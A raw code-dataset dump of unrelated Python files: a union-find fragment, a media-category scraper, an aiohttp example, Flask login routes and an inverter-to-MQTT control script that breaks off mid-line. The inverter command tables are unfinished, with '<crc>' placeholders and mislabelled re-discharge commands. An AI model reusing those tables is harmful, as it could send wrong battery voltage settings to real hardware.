== x:\n return x\n self.father[x] = self.find(self.father[x])\n return self.father[x]\n","sub_path":"lintcode/805.1.py","file_name":"805.1.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"283007291","text":"# -*- coding: utf-8 -*\n# This class is for subcategories on pages like Bolibompa\n# Do not confuse with the main categories accessible from the root page.\n\nfrom common import *\n\nclass CategoryInfo:\n def __init__(self):\n self.url = None\n self.thumbUrl = None\n self.name = None\n def GetMediaItems(self):\n pages = GetPaginatePages(self.url, \"sb\")\n epUrls = []\n for page in pages:\n epUrls = epUrls + GetEpisodeUrlsFromPage(page)\n\n epList = []\n for epUrl in epUrls:\n #Log(\"EPURL: %s\" % epUrl)\n epInfo = GetEpisodeInfo(epUrl)\n epList.append(epInfo.GetMediaItem())\n return epList\n\n \ndef GetCategoryContents(ci):\n list = ObjectContainer(title2=ci.name)\n list += ci.GetMediaItems()\n return list\n\ndef GetCategoryInfosFromPage(url):\n Log(\"GetCategoryUrlsFromPage: %s\" % url)\n catUrls = []\n pageElement = None\n try: \n pageElement = HTML.ElementFromURL(url, cacheTime = CACHE_TIME_1DAY) \n except:\n Log(\"page fetch fail\")\n return None \n\n catInfoList = []\n catElems = pageElement.xpath(\"//div[@id='sb']//div[@class='content']//li/a[@class='folder overlay tooltip']/..\")\n for catElem in catElems:\n catName = catElem.xpath(\".//span/text()\")[0]\n catUrl = url + catElem.xpath(\".//a/@href\")[0]\n catThumbUrl = catElem.xpath(\".//a//img[@class='folder-thumb']/@src\")[0]\n Log(\"CatName: %s\" % catName)\n Log(\"CatUrl: %s\" % catUrl)\n Log(\"CatThumbUrl: %s\" % catThumbUrl)\n ci = CategoryInfo()\n ci.name = catName\n ci.url = catUrl\n ci.thumbUrl = catThumbUrl\n catInfoList.append(ci)\n\n return catInfoList\n\n \n","sub_path":"Contents/Code/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"216272899","text":"#!/usr/bin/env python3\n\nimport sys, os, fileinput\n\n\n\ndef readLines(fileName):\n try:\n with open(fileName, \"r\") as h:\n lines = h.readlines()\n return lines\n except IOError as e:\n sys.stderr.write(\"ERROR: Cannot read the file %s\" % fileName)\n raise SystemExit\n\n\nif __name__ == \"__main__\":\n\n if len(sys.argv)<3:\n print(\"Job call generator. (c) 2013 Julian Wergieluk. \")\n print(\"Usage: %s job-name argument-file\" % sys.argv[0])\n sys.exit()\n\n job_name = os.path.abspath(sys.argv[1])\n\n args = readLines(sys.argv[2] ) \n\n try:\n for arg in args:\n sys.stdout.write( \"%s %s %s\\n\" % (job_name, arg.strip(), \" \".join(sys.argv[3:]) ))\n except IOError as e:\n pass\n\n\n\n","sub_path":"eex/gen-jobs.py","file_name":"gen-jobs.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"269971433","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author: bigfoolliu\n\n\n\"\"\"\naiohttp模式使用\n\n客户端示例\n\nhttps://docs.aiohttp.org/en/stable/\n\"\"\"\n\nimport asyncio\nimport aiohttp\n\nurl = 'http://python.org'\n\n\nasync def main():\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n print(f'status: {response.status}')\n print(f'content-type: {response.headers.get(\"content-type\")}')\n\n html = await response.text()\n print(f'body: {html[0:10]} ...')\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n","sub_path":"language/python/modules/Web/aiohttp/aiohttp_module_client.py","file_name":"aiohttp_module_client.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"563891034","text":"\"\"\"Logged-in page routes.\"\"\"\nfrom flask import Blueprint, render_template, redirect, url_for\nfrom flask_login import current_user, login_required, logout_user\n\nimport time\nfrom flask import Response\n\n# Blueprint Configuration\nmain_bp = Blueprint('main_bp', __name__,\n template_folder='templates',\n static_folder='static')\n\n\n@main_bp.route('/', methods=['GET'])\n@login_required\ndef dashboard():\n \"\"\"Logged-in User Dashboard.\"\"\"\n return render_template('dashboard.jinja2',\n title='Flask-Login Tutorial.',\n template='dashboard-template',\n current_user=current_user,\n body=\"You are now logged in, see <a href=\\\"video_feed\\\">video!</a>\")\n\n\n@main_bp.route(\"/logout\")\n@login_required\ndef logout():\n \"\"\"User log-out logic.\"\"\"\n logout_user()\n return redirect(url_for('auth_bp.login'))\n\n\n@main_bp.route('/video_feed')\ndef video_feed():\n if not current_user.is_authenticated:\n return redirect(url_for('auth_bp.login'))\n\n \"\"\"Video streaming route. Put this in the src attribute of an img tag.\"\"\"\n return Response(gen(),\n mimetype='multipart/x-mixed-replace; boundary=frame')\ndef gen():\n \"\"\"Video streaming generator function.\"\"\"\n i = 0\n while True:\n path = \"files/IMG\" + str(i) + \".jpg\"\n image = open(path, 'rb').read()\n i = i + 1\n if i > 3:\n i = 0\n\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + image + b'\\r\\n')\n\n time.sleep(0.2)\n","sub_path":"extensions/iocloud/login/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"145742667","text":"#!/usr/bin/python3\r\n\r\nimport paho.mqtt.client as mqtt\r\nimport serial\r\nimport time\r\n \r\n#broker = 'www.mqtt-dashboard.com'\r\nbroker = 'localhost'\r\ntopic = 'my_solar'\r\n\r\n\r\n# КОМАНДЫ + СRC16 ДЛЯ ПЕРЕДАЧИ В ИНВЕРТОР \r\n\r\nQPIGS = [0x51,0x50,0x49,0x47,0x53,0xB7,0xA9,0x0D] # Device general status parameters inquiry\r\nQPIGS = [0x51,0x50,0x49,0x47,0x53,0xB7,0xA9,0x0D]\r\nQMCHGCR = [0x51,0x4D,0x43,0x48,0x47,0x43,0x52,0xD8,0x55,0x0D] # Enquiry selectable value about max charging current\r\nQMUCHGCR = [0x51,0x4D,0x55,0x43,0x48,0x47,0x43,0x52,0x26,0x34,0x0D] # Enquiry selectable value about max utility charging current\r\nQPIWS = [0x51,0x50,0x49,0x57,0x53,0xB4,0xDA,0x0D] # Device Warning Status inquiry\r\nQMOD = [0x51,0x4D,0x4F,0x44,0x49,0xC1,0x0D] # Device Mode inquiry\r\nQID = [0x51,0x49,0x44,0xD6,0xEA,0x0D] # The device serial number inquiry\r\nQDI = [0x51,0x44,0x49,0x71,0x1B,0x0D] # The default setting value information\r\nQVFW = [0x51,0x56,0x46,0x57,0x62,0x99,0x0D] # Main CPU Firmware version inquiry\r\nQVFW2 = [0x51,0x56,0x46,0x57,0x32,0xC3,0xF5,0x0D] # Another CPU Firmware version inquiry\r\n\r\nQPIRI = [0x51,0x50,0x49,0x52,0x49,0xF8,0x54,0x0D] # Device Rating Information inquiry\r\n\r\nQFLAG = [0x51,0x46,0x4C,0x41,0x47,0x98,0x74,0x0D] # Device flag status inquiry \r\nACK = [0x41,0x43,0x4B,0x39,0x20,0x0D] # Device response\r\nPOP = {'UTI':[0x50,0x4F,0x50,0x30,0x30,0xC2,0x48,0x0D], # Setting device output source priority to UTI\r\n 'SOL':[0x50,0x4F,0x50,0x30,0x31,0xD2,0x69,0x0D], # Setting device output source priority to SOL\r\n 'SBU':[0x50,0x4F,0x50,0x30,0x32,0xE2,0x0B,0x0D] # Setting device output source priority to SBU\r\n }\r\nPCP = {'UTI':[0x50,0x43,0x50,0x30,0x30,0x8D,0x7A,0x0D], # Setting device charger priority to UTI first\r\n 'SOL':[0x50,0x43,0x50,0x30,0x31,0x9D,0x5B,0x0D], # Setting device charger priority to SOL first\r\n 'SOL+UTI':[0x50,0x43,0x50,0x30,0x32,0xAD,0x38,0x0D], # Setting device charger priority to SOL+UTI\r\n 'OnlySOL':[0x50,0x43,0x50,0x30,0x33,0xBD,0x19,0x0D] # Setting device charger priority to OnlySOL\r\n }\r\nPGR = {'APP':[0x50,0x47,0x52,0x30,0x30,0x29,0xEB,0x0D], # Setting device grid working range to APP\r\n 'UPS':[0x50,0x47,0x52,0x30,0x31,0x39,0xCA,0x0D] # Setting device grid working range to UPS\r\n } \r\nPBCV = {'44.0':[0x50,0x42,0x43,0x56,0x34,0x34,0x2E,0x30,0xE6,0xEB,0x0D], # Set battery re-charge voltage to 44.0 V\r\n '45.0':[0x50,0x42,0x43,0x56,0x34,0x35,0x2E,0x30,0xD1,0xDB,0x0D], # Set battery re-charge voltage to 45.0 V\r\n '46.0':[0x50,0x42,0x43,0x56,0x34,0x36,0x2E,0x30,0x88,0x8B,0x0D], # Set battery re-charge voltage to 46.0 V\r\n '47.0':[0x50,0x42,0x43,0x56,0x34,0x37,0x2E,0x30,0xBF,0xBB,0x0D], # Set battery re-charge voltage to 47.0 V\r\n '48.0':[0x50,0x42,0x43,0x56,0x34,0x38,0x2E,0x30,0x93,0x8A,0x0D], # Set battery re-charge voltage to 48.0 V\r\n '49.0':[0x50,0x42,0x43,0x56,0x34,0x39,0x2E,0x30,0xA4,0xBA,0x0D], # Set battery re-charge voltage to 49.0 V\r\n '50.0':[0x50,0x42,0x43,0x56,0x35,0x30,0x2E,0x30,0x4C,0x9F,0x0D], # Set battery re-charge voltage to 50.0 V\r\n '51.0':[0x50,0x42,0x43,0x56,0x35,0x31,0x2E,0x30,0x7B,0xAF,0x0D] # Set battery re-charge voltage to 51.0 V\r\n }\r\nPSDV = {'40.0':'\\x50\\x53\\x44\\x56\\x34\\x30\\x2E\\x30 <crc> \\x0D', # Set battery under voltage to 40.0 V\r\n '41.0':'\\x50\\x53\\x44\\x56\\x34\\x31\\x2E\\x30 <crc> \\x0D', # Set battery under voltage to 41.0 V\r\n '42.0':'\\x50\\x53\\x44\\x56\\x34\\x32\\x2E\\x30 <crc> \\x0D', # Set battery under voltage to 42.0 V\r\n '43.0':'\\x50\\x53\\x44\\x56\\x34\\x33\\x2E\\x30 <crc> \\x0D', # Set battery under voltage to 43.0 V\r\n '44.0':'\\x50\\x53\\x44\\x56\\x34\\x34\\x2E\\x30 <crc> \\x0D', # Set battery under voltage to 44.0 V\r\n '45.0':'\\x50\\x53\\x44\\x56\\x34\\x35\\x2E\\x30 <crc> \\x0D', # Set battery under voltage to 45.0 V\r\n '46.0':'\\x50\\x53\\x44\\x56\\x34\\x36\\x2E\\x30 <crc> \\x0D', # Set battery under voltage to 46.0 V\r\n '47.0':'\\x50\\x53\\x44\\x56\\x34\\x37\\x2E\\x30 <crc> \\x0D', # Set battery under voltage to 47.0 V\r\n '48.0':'\\x50\\x53\\x44\\x56\\x34\\x38\\x2E\\x30 <crc> \\x0D' # Set battery under voltage to 48.0 V\r\n }\r\nPBDV = {'48.0':'\\x50\\x42\\x44\\x56\\x34\\x38\\x2E\\x30 <crc> \\x0D', # Set battery re-discharge voltage to 48.0 V\r\n '49.0':'\\x50\\x53\\x44\\x56\\x34\\x39\\x2E\\x30 <crc> \\x0D', # Set battery re-discharge voltage to 49.0 V\r\n '50.0':'\\x50\\x53\\x44\\x56\\x35\\x30\\x2E\\x30 <crc> \\x0D', # Set battery re-discharge voltage to 50.0 V\r\n '51.0':'\\x50\\x53\\x44\\x56\\x35\\x31\\x2E\\x30 <crc> \\x0D', # Set battery re-discharge voltage to 51.0 V\r\n '52.0':'\\x50\\x53\\x44\\x56\\x35\\x32\\x2E\\x30 <crc> \\x0D', # Set battery re-discharge voltage to 52.0 V\r\n '53.0':'\\x50\\x53\\x44\\x56\\x35\\x33\\x2E\\x30 <crc> \\x0D', # Set battery re-discharge voltage to 53.0 V\r\n '54.0':'\\x50\\x53\\x44\\x56\\x35\\x34\\x2E\\x30 <crc> \\x0D', # Set battery re-discharge voltage to 54.0 V\r\n '55.0':'\\x50\\x53\\x44\\x56\\x35\\x35\\x2E\\x30 <crc> \\x0D', # Set battery re-discharge voltage to 55.0 V\r\n '56.0':'\\x50\\x53\\x44\\x56\\x35\\x36\\x2E\\x30 <crc> \\x0D', # Set battery re-discharge voltage to 56.0 V\r\n '57.0':'\\x50\\x53\\x44\\x56\\x35\\x37\\x2E\\x30 <crc> \\x0D', # Set battery re-discharge voltage to 57.0 V\r\n '58.0':'\\x50\\x53\\x44\\x56\\x35\\x38\\x2E\\x30 <crc> \\x0D' # Set battery re-discharge voltage to 58.0 V \r\n }\r\n \r\n\r\ndevice_serial = 'xxxxxxxxxxxxxx'\r\ncmd = ''\r\nset_time = 30 # периодичность опроса инвертора xx, s\r\nst_read = 0\r\ninfo_rd = False\r\nser_state = False\r\nmqtt_connect = False\r\n\r\n\r\n# ================== РАСЧЕТ СRC16 ====================\r\n# процедура расчета CRC16 по алгоритму CRC-CCITT (XModem)\r\n# https://bytes.com/topic/python/insights/887357-python-check-crc-frame-crc-16-ccitt \r\n# CRC-16-CITT poly, the CRC sheme used by ymodem protocol\r\n# 16bit operation register, initialized to zeros\r\n# message - строка данных, для которой расчитывается CRC\r\n# функция возвращает два байта СRC16\r\n\r\ndef crc16(message):\r\n poly = 0x1021\r\n reg = 0\r\n message += b'\\x00\\x00'\r\n #msg = message.encode(\"utf-8\")\r\n msg = message\r\n for byte in msg:\r\n mask = 0x80\r\n while(mask > 0):\r\n reg<<=1\r\n if byte & mask: \r\n reg += 1\r\n mask>>=1\r\n if reg > 0xffff: \r\n reg &= 0xffff \r\n reg ^= poly\r\n crc_h = reg >> 8\r\n crc_l = reg & 0xFF \r\n return bytes([crc_h, crc_l])\r\n\r\n\r\n\r\n# ======== ОБМЕН С ИНВЕРТОРОМ ЧЕРЕЗ COM-ПОРТ =========\r\n# инициализация СОМ-порта, передача запроса к инвертору и получение данных от инвертора\r\n# msg_wr - массив байт для передачи инвертору через СОМ-порт\r\n# length - количество байт, принятых от инвертора через СОМ-порт\r\n# data - строка данных, принятых от инвертора через СОМ-порт \r\n# rd_crc - 2 байта CRC16, принятых от инвертора через СОМ-порт\r\n# calc_crc - 2 байта CRC16, расчитанной для принятых данных\r\n# сrc_ok - критерий достоверности данных\r\n# функция возвращает кортеж вида : <data> , <length>, <сrc_ok>\r\n# если при инициализации СОМ-порта произошла ошибка или\r\n# данные от инвертора приняты с ошибкой, \r\n# выходные данные функции обнуляются\r\n\r\ndef comm_inverter(msg_wr):\r\n \r\n# - инициализация переменных\r\n global ser_state\r\n ser_state = False\r\n сrc_ok = False\r\n data = ''\r\n length = 0\r\n \r\n# - инициализация СОМ-порта \r\n try:\r\n #print('инициализация СОМ-порта')\r\n# --- для тестирования скрипта на ПК ---\r\n# ser = serial.Serial(\r\n# port='COM3', \r\n# baudrate = 2400,\r\n# parity=serial.PARITY_NONE,\r\n# stopbits=serial.STOPBITS_ONE,\r\n# bytesize=serial.EIGHTBITS,\r\n# timeout=1\r\n# )\r\n# --------------------------------------\r\n\r\n ser = serial.Serial( \r\n port='/dev/ttyAMA0',\r\n baudrate = 2400,\r\n parity=serial.PARITY_NONE,\r\n stopbits=serial.STOPBITS_ONE,\r\n bytesize=serial.EIGHTBITS,\r\n timeout=1\r\n )\r\n\r\n# - обработка ошибки инициализации COM-порта\r\n\r\n except serial.SerialException: \r\n print('СОМ-порт не обнаружен\\n\\r')\r\n data = ''\r\n length = 0\r\n сrc_ok = False\r\n\r\n# - успешная инициализация - работа с COM-портом\r\n \r\n else: \r\n ser_state = True\r\n #print('СОМ-порт ОК\\n\\r')\r\n# ser.flushInput() # очистить буфер ввода\r\n# ser.flushOutput() # очистить буфер вывода\r\n# time.sleep(0.1)\r\n\r\n# - передача данных в СОМ-порт\r\n\r\n ser.write(bytearray(msg_wr)) \r\n time.sleep(0.5)\r\n \r\n# - прием данных из СОМ-порта и вычисление CRC\r\n \r\n msg_rd = ser.readline()\r\n #print('\\n\\rприем данных из СОМ-порта')\r\n length = len(msg_rd)\r\n #data = msg_rd[:-3].decode('utf-8')\r\n data = msg_rd[:-3]\r\n rd_crc = msg_rd[-3:-1]\r\n calc_crc = crc16(data)\r\n print('Write to INVERTER', bytes(msg_wr)) \r\n print('Read from INVERTER', length, 'byte :', msg_rd)\r\n сrc_ok = rd_crc == calc_crc\r\n if сrc_ok:\r\n #print('-- Data OK, CRC OK --')\r\n data = data.decode()\r\n else: \r\n print('----- CRC error -----')\r\n data = '' \r\n\r\n# - выходные переменные процедуры обмена с инвертором\r\n \r\n finally:\r\n return data, length, сrc_ok\r\n pass\r\n \r\n# == ПОДКЛЮЧЕНИЕ К MQTT-БРОКЕРУ И ПОДПИСКА НА ТОПИКИ ==\r\n# client - выходная переменная идентификации клиента\r\n# userdata - выходная переменная ...\r\n# flags - выходная переменная ...\r\n# rc - выходная переменная - код подключения:\r\n# 0: Connection successful \r\n# 1: Connection refused - incorrect protocol version \r\n# 2: Connection refused - invalid client identifier \r\n# 3: Connection refused - server unavailable \r\n# 4: Connection refused - bad username or password \r\n# 5: Connection refused - not authorised \r\n# 6-255: Currently unused.\r\n\r\ndef on_connect(client, userdata, flags, rc):\r\n global mqtt_connect\r\n mqtt_connect = True\r\n print('Connected...', 'CLIENT:', client, 'USERDATA:', userdata, 'FLAGS:', flags, 'CODE =', rc)\r\n client.subscribe(topic+'/#')\r\n \r\n \r\n\r\ndef on_disconnect(client, userdata, rc):\r\n global mqtt_connect\r\n mqtt_connect = False\r\n print('Disconnect ', 'CLIENT:', client, 'CODE = ', rc)\r\n \r\n \r\n\r\n\r\n\r\n# == ПОЛУЧЕНИЕ КОМАНД ОТ MQTT-БРОКЕРА И ПЕРЕДАЧА ИНВЕРТОРУ ==\r\n# client - выходная переменная идентификации клиента\r\n# userdata - выходная переменная ...\r\n# msg - полученное сообщение:\r\n# msg.topic - подписка\r\n# msg.payload - тело сообщения\r\n# msg.qos - \"качество обслуживания\"\r\n# при получении от MQTT-брокера сообщения из топика, на который оформлена подписка\r\n# полученное сообщение интерпретируется, как команда для передачи инвертору \r\n# команда передается инвертору через СОМ-порт\r\n# полученное от инвертора подтверждение от инвертора публикуется на MQTT-брокере \r\n\r\ndef on_message(client, userdata, msg):\r\n #print('Received message...', 'CLIENT:', client, 'USERDATA:', userdata, 'TOPIC:', msg.topic, 'MESSAGE:', msg.payload, 'QoS =', msg.qos)\r\n cmd = msg.payload.decode() \r\n \r\n# - период опроса инвертора, s\r\n\r\n if msg.topic == topic+'/set/period_s': \r\n set_time = int(cmd)\r\n\r\n# передача команд к инвертеру возможна только в том случае, \r\n# если информация от инвертора ранее уже была получена\r\n\r\n if info_rd :\r\n\r\n# - SET device source range\r\n\r\n if msg.topic == topic+'/set/device_source_range' and cmd != source_range :\r\n #print('SET_source_range :', cmd)\r\n try:\r\n reply = comm_inverter(PGR[cmd]) # 'PGR'+<cmd>+<crc16>\r\n data = reply[0]\r\n length = reply[1]\r\n crc_ok = reply[2]\r\n if data == '(ACK' and crc_ok : \r\n set_source_range = True\r\n #print('SETTTING device source range OK')\r\n else :\r\n set_source_range = False\r\n #print('SETTTING device source range ERR')\r\n except:\r\n set_source_range = False\r\n #print('SETTTING device source range CMD WRONG')\r\n finally: \r\n client.publish(topic+'/ack/device_source_range', set_source_range, 0)\r\n \r\n# - SET source_priority\r\n\r\n if msg.topic == topic+'/set/source_priority' and cmd != source_priority :\r\n #print('Set_source_priority :', cmd)\r\n try:\r\n reply = comm_inverter(POP[cmd]) # 'POP'+<cmd>+<crc16>\r\n data = reply[0]\r\n length = reply[1]\r\n crc_ok = reply[2]\r\n if data == '(ACK' and crc_ok :\r\n set_source_priority = True\r\n #print('SETTTING source priority OK')\r\n else :\r\n set_source_priority = False\r\n #print('SETTTING source priority ERR')\r\n except:\r\n set_source_priority = False\r\n #print('SETTTING source priority CMD WRONG') \r\n finally: \r\n client.publish(topic+'/ack/source_priority', set_source_priority, 0)\r\n \r\n# - SET charger priority\r\n\r\n if msg.topic == topic+'/set/charger_priority' and cmd != charger_priority :\r\n #print('SET_charger_priority :', cmd)\r\n try:\r\n reply = comm_inverter(PCP[cmd]) # 'PCP'+<cmd>+<crc16>\r\n data = reply[0]\r\n length = reply[1]\r\n crc_ok = reply[2]\r\n if data == '(ACK' and crc_ok :\r\n set_charger_priority = True\r\n #print('SETTTING charger priority OK')\r\n else :\r\n set_charger_priority = False\r\n #print('SETTTING charger priority ERR')\r\n except:\r\n set_charger_priority = False\r\n #print('SETTTING charger priority CMD WRONG') \r\n finally: \r\n client.publish(topic+'/ack/charger_priority', set_charger_priority, 0)\r\n \r\n# - SET batt recharge voltage\r\n\r\n if msg.topic == topic+'/set/batt_recharge_voltage' :\r\n value = '{:0>4.1f}'.format(float(cmd)) # интерпретировать <cmd>, как число в формате ХХ.Х\r\n if batt_recharge_voltage != value :\r\n #print('SET_batt_recharge_voltage :', cmd)\r\n try:\r\n reply = comm_inverter(PBCV[value]) # 'PBCV'+<value>+<crc16>\r\n data = reply[0]\r\n length = reply[1]\r\n crc_ok = reply[2]\r\n if data == '(ACK' and crc_ok :\r\n set_batt_recharge_voltage = True\r\n #print('SETTTING batt recharge voltage OK')\r\n else :\r\n set_batt_recharge_voltage = False\r\n #print('SETTTING batt recharge voltage ERR')\r\n except:\r\n set_batt_recharge_voltage = False\r\n #print('SET batt_recharge_voltage VAL = WRONG')\r\n finally: \r\n client.publish(topic+'/ack/batt_recharge_voltage', set_batt_recharge_voltage, 0)\r\n\r\n# - SET batt under voltage\r\n\r\n if msg.topic == topic+'/set/batt_under_voltage' :\r\n value = '{:0>4.1f}'.format(float(cmd)) # интерпретировать <cmd>, как число в формате ХХ.Х \r\n if batt_under_voltage != value :\r\n #print('SET_batt_under_voltage :', cmd) \r\n try:\r\n reply = comm_inverter(PSDV[value]) # 'PSDV'+<value>+<crc16>\r\n data = reply[0]\r\n length = reply[1]\r\n crc_ok = reply[2]\r\n if data == '(ACK' and crc_ok :\r\n set_batt_under_voltage = True\r\n #print('SETTTING batt under voltage OK')\r\n else :\r\n set_batt_under_voltage = False\r\n #print('SETTTING batt under voltage ERR')\r\n except:\r\n set_batt_under_voltage = False\r\n #print('SET batt under voltage VAL WRONG') \r\n finally: \r\n client.publish(topic+'/ack/batt_under_voltage', set_batt_under_voltage, 0) \r\n \r\n# - SET batt redischarge voltage\r\n\r\n if msg.topic == topic+'/set/batt_redischarge_voltage' :\r\n value = '{:0>4.1f}'.format(float(cmd)) # интерпретировать <cmd>, как число в формате ХХ.Х \r\n if batt_redischarge_voltage != value :\r\n #print('SET_batt_redischarge_voltage :', value) \r\n try:\r\n reply = comm_inverter(PBDV[value]) # 'PBDV'+<value>+<crc16>\r\n data = reply[0]\r\n length = reply[1]\r\n crc_ok = reply[2]\r\n if data == '(ACK' and crc_ok :\r\n set_batt_redischarge_voltage = True\r\n #print('SETTTING batt redischarge voltage OK')\r\n else :\r\n set_batt_redischarge_voltage = False\r\n #print('SETTTING batt redischarge voltage ERR')\r\n except:\r\n set_batt_redischarge_voltage = False\r\n #print('SET batt_redischarge voltage VAL WRONG') \r\n finally: \r\n client.publish(topic+'/ack/batt_redischarge_voltage', set_batt_redischarge_voltage, 0) \r\n pass \r\n\r\n# ===== ПОДТВЕРЖДЕНИЕ ПУБЛИКАЦИИ НА MQTT-БРОКЕРЕ =====\r\n\r\ndef on_publish(client, userdata, mid):\r\n #print('Publish OK...', 'CLIENT:', client, 'USERDATA:', userdata, 'MID =', mid)\r\n pass\r\n\r\n\r\n\r\n# КЛИЕНТ MQTT\r\n\r\n# - Client ID = серийный номер инвертора \r\n\r\nwhile device_serial == 'xxxxxxxxxxxxxx' and st_read < 3:\r\n st_read = st_read + 1\r\n reply = comm_inverter(QID)\r\n data = reply[0]\r\n length = reply[1]\r\n crc_ok = reply[2]\r\n if crc_ok and length == 26 : device_serial = data[1:]\r\n print(st_read, ':', device_serial)\r\nst_read = 0 \r\n\r\n\r\nclient = mqtt.Client(device_serial)\r\ntry: \r\n client.connect(broker, 1883, 60)\r\nexcept:\r\n #print('MQTT брокер не найден !')\r\n pass\r\nclient.on_connect = on_connect\r\nclient.on_disconnect = on_disconnect\r\nclient.on_message = on_message\r\n#client.on_publish = on_publish\r\nclient.loop_start()\r\n\r\n\r\n\r\n# ПЕРИОДИЧЕСКИЙ ОПРОС ИНВЕРТОРА И ПУБЛИКАЦИЯ ДАННЫХ У БРОКЕРА\r\n# publish(topic, payload, wait_for_publish)\r\n# wait_for_publish == 0 - публикация вне зависимости от наличия связи с брокером, данные могут быть потеряны\r\n# wait_for_publish == 1 - публикация состоится только при наличии связи с брокером, все данные будут опубликованы после соединения с брокером\r\n\r\ntime_pre = time.time() - set_time\r\nac_energy_pre = 0 # потребление энергии x.хххх, kW*h \r\npv_energy_pre = 0.0 # энергия солнечных панелей х.хxxx, kW*h\r\n\r\nwhile True :\r\n\r\n cycle = time.time() - time_pre\r\n if cycle >= set_time :\r\n time_pre = time.time()\r\n if mqtt_connect :\r\n #client.publish(topic+'/script_state', True, 0) \r\n \r\n# - параметры инвертора\r\n\r\n grid_voltage = 0.0 # напряжение сети xxx.x, V\r\n grid_frequency = 0.0 # частота сети хх.х, Hz\r\n ac_voltage = 0.0 # выходное напряжение инвертора ххх.х, V\r\n ac_frequency = 0.0 # частота на выходе инвертора хх.х, Hz\r\n ac_va_power = 0 # полная выходная мощность хххх, VA\r\n ac_w_power = 0 # активная выходная мощность хххх, W\r\n #ac_energy = 0 # потребление энергии x.хххх, kW*h \r\n ac_load = 0 # нагрузка инвертора ххх, %\r\n bus_voltage = 0 # напряжение шины постоянного тока ххх, V\r\n batt_voltage = 0.0 # напряжение батареи хх.х, V \r\n batt_charging = 0.0 # ток заряда батареи хх.х, А \r\n batt_capacity = 0 # емкость батареи xxx, %\r\n temp_inverter = 0 # температура инвертора xxxx, T\r\n pv_current = 0 # выходной ток солнечных панелей xxxx, A\r\n pv_voltage = 0.0 # выходное напряжение солнечных панелей xxx.x, V\r\n pv_power = 0.0 # выходная мощность солнечных панелей xxxx.х, W\r\n #pv_energy = 0.0 # энергия солнечных панелей х.хxxx, kW*h \r\n scc_voltage = 0.0 # напряжение заряда от солнечных панелей xx.xx, V\r\n batt_discharge = 0 # разрядный ток от аккумулятора ххх, А\r\n device_status = '00000000' # байт состояния инвертора\r\n load = 0 # нагрузка инвртора\r\n charging = 'unknow' # источник зарядки батареи\r\n charging_status = 0 # Charging On/Off\r\n charging_scc = 0 # Charging with SCC\r\n charging_grid = 0 # Charging with AC grid\r\n comm_state = 'ok' # состояние обмена с инвертором\r\n \r\n reply = comm_inverter(QPIGS)\r\n data = reply[0]\r\n length = reply[1]\r\n crc_ok = reply[2]\r\n print(data, 'len =', length) \r\n if crc_ok and length == 110 : \r\n try:\r\n # для корректного представления в числовом виде на всякий случай предусмотрена замена ',' на '.'\r\n grid_voltage = float(data[1:6].replace(',', '.'))\r\n grid_frequency = float(data[7:11].replace(',', '.'))\r\n ac_voltage = float(data[12:17].replace(',', '.'))\r\n ac_frequency = float(data[18:22].replace(',', '.'))\r\n ac_va_power = int(data[23:27])\r\n ac_w_power = int(data[28:32])\r\n ac_load = int(data[33:36])\r\n bus_voltage = int(data[37:40])\r\n batt_voltage = float(data[41:46].replace(',', '.'))\r\n batt_charging = float(data[47:50].replace(',', '.'))/10.0\r\n batt_capacity = int(data[51:54])\r\n temp_inverter = int(data[55:59])\r\n pv_current = int(data[60:64])\r\n pv_voltage = float(data[65:70].replace(',', '.'))\r\n scc_voltage = float(data[71:76].replace(',', '.'))\r\n batt_discharge = int(data[77:82])\r\n device_status = data[83:91] \r\n load = device_status[3]\r\n charging_status = device_status[5]\r\n charging_scc = device_status[6]\r\n charging_grid = device_status[7]\r\n \r\n if device_status[5:] == '000' : charging = 'NOT charging'\r\n if device_status[5:] == '110' : charging = 'Charging with SCC'\r\n if device_status[5:] == '101' : charging = 'Charging with AC grid'\r\n if device_status[5:] == '111' : charging = 'Charging with SCC + AC grid'\r\n except: \r\n comm_state = 'decryption error'\r\n else: \r\n if ser_state : comm_state = 'read error'\r\n else : comm_state = 'COM-port error'\r\n\r\n ac_energy = round(((ac_energy_pre + float(ac_w_power * cycle / 3600000.0)) / 2), 4) # расчет потребления энергии за период опроса инвертора\r\n ac_energy_pre = float(ac_w_power * cycle / 3600000.0)\r\n pv_power = round(float(pv_current * pv_voltage),2)\r\n pv_energy = round(((pv_energy_pre + float(pv_power * cycle / 3600000.0)) / 2), 4) # расчет солнечной энергии за период опроса инвертора \r\n pv_energy_pre = float(pv_power * cycle / 3600000.0)\r\n \r\n print('QPIGS : ', comm_state)\r\n \r\n client.publish(topic+'/status/grid_voltage', grid_voltage, 0)\r\n client.publish(topic+'/status/grid_frequency', grid_frequency, 0)\r\n client.publish(topic+'/status/ac_voltage', ac_voltage, 0)\r\n client.publish(topic+'/status/ac_frequency', ac_frequency, 0)\r\n client.publish(topic+'/status/ac_va_power', ac_va_power, 0)\r\n client.publish(topic+'/status/ac_w_power', ac_w_power, 0)\r\n client.publish(topic+'/status/ac_energy', ac_energy, 0)\r\n client.publish(topic+'/status/ac_load', ac_load, 0)\r\n client.publish(topic+'/status/bus_voltage', bus_voltage, 0)\r\n client.publish(topic+'/status/batt_voltage', batt_voltage, 0)\r\n client.publish(topic+'/status/batt_charging', batt_charging, 0)\r\n client.publish(topic+'/status/batt_capacity', batt_capacity, 0)\r\n client.publish(topic+'/status/temp_inverter', temp_inverter, 0)\r\n client.publish(topic+'/status/pv_current', pv_current, 0)\r\n client.publish(topic+'/status/pv_voltage', pv_voltage, 0)\r\n client.publish(topic+'/status/pv_power', pv_power, 0)\r\n client.publish(topic+'/status/pv_energy', 